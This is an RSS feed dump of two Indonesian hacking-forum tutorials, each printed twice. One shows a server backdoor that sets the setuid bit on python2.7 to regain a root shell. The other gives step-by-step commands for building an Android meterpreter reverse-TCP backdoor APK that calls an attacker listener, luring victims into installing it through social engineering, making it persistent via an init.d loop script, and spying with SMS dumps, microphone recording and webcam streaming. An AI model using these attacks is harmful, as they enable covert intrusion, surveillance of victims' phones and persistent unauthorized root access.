<![CDATA[BackBox Indonesia - Maintaining Access]]> https://www.backboxindonesia.or.id/ Sun, 21 Jun 2026 01:51:51 +0000 MyBB <![CDATA[Tanam rootkit tanpa menambahkan file/rootkit ke dalam server]]> https://www.backboxindonesia.or.id/thread-232.html Sat, 18 Nov 2017 10:25:36 +0000 https://www.backboxindonesia.or.id/thread-232.html Gimana caranya?? Ko bisa?? Penasaran bukan??

Mungkin bagi kalian yang terbiasa menggunakan python trik ini sangatlah mudah dan sangat sederhana, kita tinggal menambahkan hak akses sticky bit ke dalam suatu file. Dalam contoh kali ini saya menambahkan hak akses sticky bit ke dalam file python sendiri.
Caranya cukup mudah, kita tinggal ketikan perintah "chmod +s" menggunakan user root. Sebagai contoh perintahnya seperti ini

Code:
$ chmod +s /usr/bin/python2.7

Lalu apa yang harus kita lakukan setelah merubah hak akses file tersebut??
Caranya kita tinggal masuk ke shell interactive python kemudian kita setuid menjadi 0. Perintahnya kurang lebih seperti ini

Code:
$ id
uid=1000(user) gid=1000(user) groups=1000(user)
$ python
Python 2.7.14 (default, Sep 23 2017, 22:06:14)
[GCC 7.2.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import os
>>> os.setuid(0)
>>> os.setgid(0)
>>> os.system('id')
uid=0(root) gid=0(root) groups=0(root),1000(user)
>>> os.system('/bin/bash')
$ id
uid=0(root) gid=0(root) groups=0(root),1000(user)

Cukup mudah bukan??
Sebelumnya saya pernah share juga cara menanam rootkit ke dalam server dengan mengupload program suid di sini. Kali ini caranya cukup sederhana banget bukan. :)

Catetan : karena kita menambahkan hak akses ke dalam program python, kita harus cek terlebih dahulu apakah di server target sudah terinstall python atau belum. kalo belum kita tinggal install saja pythonnya, kan udah dapet akses rootnya??
Atau kalo kalian pengen nginjeksi ke perl, bash, atau yang lainnya juga bisa ko :) tinggal atur" aja enaknya kita simpen di mana rootkit. hehe

Mungkin cukup sekian tutorial dari saya.
Semoga tutorialnya bermanfaat. :)]]> Gimana caranya?? Ko bisa?? Penasaran bukan??

Mungkin bagi kalian yang terbiasa menggunakan python trik ini sangatlah mudah dan sangat sederhana, kita tinggal menambahkan hak akses sticky bit ke dalam suatu file. Dalam contoh kali ini saya menambahkan hak akses sticky bit ke dalam file python sendiri.
Caranya cukup mudah, kita tinggal ketikan perintah "chmod +s" menggunakan user root. Sebagai contoh perintahnya seperti ini

Code:
$ chmod +s /usr/bin/python2.7

Lalu apa yang harus kita lakukan setelah merubah hak akses file tersebut??
Caranya kita tinggal masuk ke shell interactive python kemudian kita setuid menjadi 0. Perintahnya kurang lebih seperti ini

Code:
$ id
uid=1000(user) gid=1000(user) groups=1000(user)
$ python
Python 2.7.14 (default, Sep 23 2017, 22:06:14)
[GCC 7.2.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import os
>>> os.setuid(0)
>>> os.setgid(0)
>>> os.system('id')
uid=0(root) gid=0(root) groups=0(root),1000(user)
>>> os.system('/bin/bash')
$ id
uid=0(root) gid=0(root) groups=0(root),1000(user)

Cukup mudah bukan??
Sebelumnya saya pernah share juga cara menanam rootkit ke dalam server dengan mengupload program suid di sini. Kali ini caranya cukup sederhana banget bukan. :)

Catetan : karena kita menambahkan hak akses ke dalam program python, kita harus cek terlebih dahulu apakah di server target sudah terinstall python atau belum. kalo belum kita tinggal install saja pythonnya, kan udah dapet akses rootnya??
Atau kalo kalian pengen nginjeksi ke perl, bash, atau yang lainnya juga bisa ko :) tinggal atur" aja enaknya kita simpen di mana rootkit. hehe

Mungkin cukup sekian tutorial dari saya.
Semoga tutorialnya bermanfaat. :)]]> <![CDATA[Persistents Android Backdoor All Network (Public/Local)]]> https://www.backboxindonesia.or.id/thread-222.html Sun, 11 Jun 2017 09:46:48 +0000 https://www.backboxindonesia.or.id/thread-222.html


1. Biasanya kita menggunakan msfvenom untuk membuat sebuah backdoor yang nantinya akan ditanam di smarphone korban.

Code:
root@attackermachine:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=IP_LISTENER_ATTACKER LPORT=PORT_LISTENER_ATTACKER R > /tmp/backdoor.apk

Keterangan 
LHOST : diisi dengan IP Address attacker yang akan digunakan untuk listening. Jika serangan dilakukan dijaringan lokal maka diisi IP komputer attacker. Jika serangan dilakukan pada korban/target yang berada diluar jaringan (Public / over Internet) maka masukkan IP Address Public attacker yang sudah dikonfigurasi untuk memiliki layanan port forwarding.
LPORT : diisi dengan Port dari IP attacker.
*Untuk via Public dalam contoh ini misalnya bisa memakai layanan forwarding dari platform Ngrok.com


2. Lalu attacker melakukan listening dengan modul multi handler dari msfconsole seperti berikut

Code:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST IP_LISTENER_ATTACKER
msf exploit(handler) > set LPORT PORT_LISTENER_ATTACKER
msf exploit(handler) > exploit



3. Kemudian selanjutnya diperlukan Social Engineering terhadap korban supaya backdoor.apk didownload dan diinstall pada smartphone korban.


4. Saat korban menjalankan backdoor.apk maka akan terbuka sebuah sesi meterpreter seperti berikut

[Image: FFVQ4m46SYGH20jrSJsfHA.png]

Dari sini attacker sudah bisa melakukan aktivitas pada smartphone korban seperti dump_sms, dump_contacts, record_mic, webcam_snap, webcam_stream dan lain sebaginya. Jika sudah mari kita lanjutkan.


5. Selanjutnya kita akan buat sesi tersebut menjadi persistents. Maka buat sebuah file yang berisi script seperti berikut

Code:
#!/bin/bash
while :
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done

Simpan script tersebut menjadi sebuah file berformat .sh misalnya sys.sh dan simpan dimana saja misalnya di /tmp/


6. Upload file tersebut ke smartphone korban via sesi meterpreter, upload di direktori /system/etc/init.d/ atau di /etc/init.d/ pada smartphone korban.

Code:
meterpreter > cd /system/etc/init.d/
meterpreter > upload /tmp/sys.sh

Namun hal ini memerlukan akses user root, jika smartphone sudah dalam keadaan rooted baiknya lakukan upload pada direktori ini. Namun jika belum rooted, maka solusinya pada post ini saya akan upload pada direktori /sdcard/Download/  dalam smartphone korban.

Code:
meterpreter > cd /sdcard/Download/
meterpreter > upload /tmp/sys.sh



7. Eksekusi file sys.sh tersebut dengan membuka sesi console lewat meterpreter dengan perintah shell.

Code:
meterpreter > shell

[Image: NRj9fatYSk_oNzTME9gCAg.png]

Kemudian jalankan perintah berikut.

Code:
cd /sdcard/Download/
sh sys.sh

Jika sukses akan muncul output seperti berikut

[Image: qwmkkNkHSVK7Lb3lq5mXdg.png]

Tekan Ctrl+C kemudian Y untuk keluar. Jangan kawatir, persistents akan tetap perjalan di smartphone korban. Dan selesai.



BUKTI

[Image: EzFNc2QQTc2ZaE0lAqAp1Q.png]

[Image: D8Iir9gaRd2Sjr2KZTCQuw.png]

Untuk pembuktian diatas saya menempatkan sesi meterpreter yang berjalan menjadi background dan menjalankan listener kembali secara berkali - kali, dan.. korban secara otomatis akan re-connect pada komputer attacker.



Bonus video :






Notes :
  • Jika smartphone korban dalam keadaan rooted dan IP+Port listener attacker adalah Static maka persistents akan berfungsi selamanya, meskipun korban melakukan reboot.
  • Saat korban menjalankan backdoor.apk yang sudah terinstall, maka persistents akan otomatis berjalan.
  • Bisa untuk jaringan Publik.
  • Bisa untuk jaringan Local, tentu saja.
  • Untuk menghentikan persistents di korban non-root, lakukan reboot pada smartphone korban.


Oke sekian post nya, semoga bermanfaat. Terimakasih.]]>


1. Biasanya kita menggunakan msfvenom untuk membuat sebuah backdoor yang nantinya akan ditanam di smarphone korban.

Code:
root@attackermachine:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=IP_LISTENER_ATTACKER LPORT=PORT_LISTENER_ATTACKER R > /tmp/backdoor.apk

Keterangan 
LHOST : diisi dengan IP Address attacker yang akan digunakan untuk listening. Jika serangan dilakukan dijaringan lokal maka diisi IP komputer attacker. Jika serangan dilakukan pada korban/target yang berada diluar jaringan (Public / over Internet) maka masukkan IP Address Public attacker yang sudah dikonfigurasi untuk memiliki layanan port forwarding.
LPORT : diisi dengan Port dari IP attacker.
*Untuk via Public dalam contoh ini misalnya bisa memakai layanan forwarding dari platform Ngrok.com


2. Lalu attacker melakukan listening dengan modul multi handler dari msfconsole seperti berikut

Code:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST IP_LISTENER_ATTACKER
msf exploit(handler) > set LPORT PORT_LISTENER_ATTACKER
msf exploit(handler) > exploit



3. Kemudian selanjutnya diperlukan Social Engineering terhadap korban supaya backdoor.apk didownload dan diinstall pada smartphone korban.


4. Saat korban menjalankan backdoor.apk maka akan terbuka sebuah sesi meterpreter seperti berikut

[Image: FFVQ4m46SYGH20jrSJsfHA.png]

Dari sini attacker sudah bisa melakukan aktivitas pada smartphone korban seperti dump_sms, dump_contacts, record_mic, webcam_snap, webcam_stream dan lain sebaginya. Jika sudah mari kita lanjutkan.


5. Selanjutnya kita akan buat sesi tersebut menjadi persistents. Maka buat sebuah file yang berisi script seperti berikut

Code:
#!/bin/bash
while :
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done

Simpan script tersebut menjadi sebuah file berformat .sh misalnya sys.sh dan simpan dimana saja misalnya di /tmp/


6. Upload file tersebut ke smartphone korban via sesi meterpreter, upload di direktori /system/etc/init.d/ atau di /etc/init.d/ pada smartphone korban.

Code:
meterpreter > cd /system/etc/init.d/
meterpreter > upload /tmp/sys.sh

Namun hal ini memerlukan akses user root, jika smartphone sudah dalam keadaan rooted baiknya lakukan upload pada direktori ini. Namun jika belum rooted, maka solusinya pada post ini saya akan upload pada direktori /sdcard/Download/  dalam smartphone korban.

Code:
meterpreter > cd /sdcard/Download/
meterpreter > upload /tmp/sys.sh



7. Eksekusi file sys.sh tersebut dengan membuka sesi console lewat meterpreter dengan perintah shell.

Code:
meterpreter > shell

[Image: NRj9fatYSk_oNzTME9gCAg.png]

Kemudian jalankan perintah berikut.

Code:
cd /sdcard/Download/
sh sys.sh

Jika sukses akan muncul output seperti berikut

[Image: qwmkkNkHSVK7Lb3lq5mXdg.png]

Tekan Ctrl+C kemudian Y untuk keluar. Jangan kawatir, persistents akan tetap perjalan di smartphone korban. Dan selesai.



BUKTI

[Image: EzFNc2QQTc2ZaE0lAqAp1Q.png]

[Image: D8Iir9gaRd2Sjr2KZTCQuw.png]

Untuk pembuktian diatas saya menempatkan sesi meterpreter yang berjalan menjadi background dan menjalankan listener kembali secara berkali - kali, dan.. korban secara otomatis akan re-connect pada komputer attacker.



Bonus video :






Notes :
  • Jika smartphone korban dalam keadaan rooted dan IP+Port listener attacker adalah Static maka persistents akan berfungsi selamanya, meskipun korban melakukan reboot.
  • Saat korban menjalankan backdoor.apk yang sudah terinstall, maka persistents akan otomatis berjalan.
  • Bisa untuk jaringan Publik.
  • Bisa untuk jaringan Local, tentu saja.
  • Untuk menghentikan persistents di korban non-root, lakukan reboot pada smartphone korban.


Oke sekian post nya, semoga bermanfaat. Terimakasih.]]>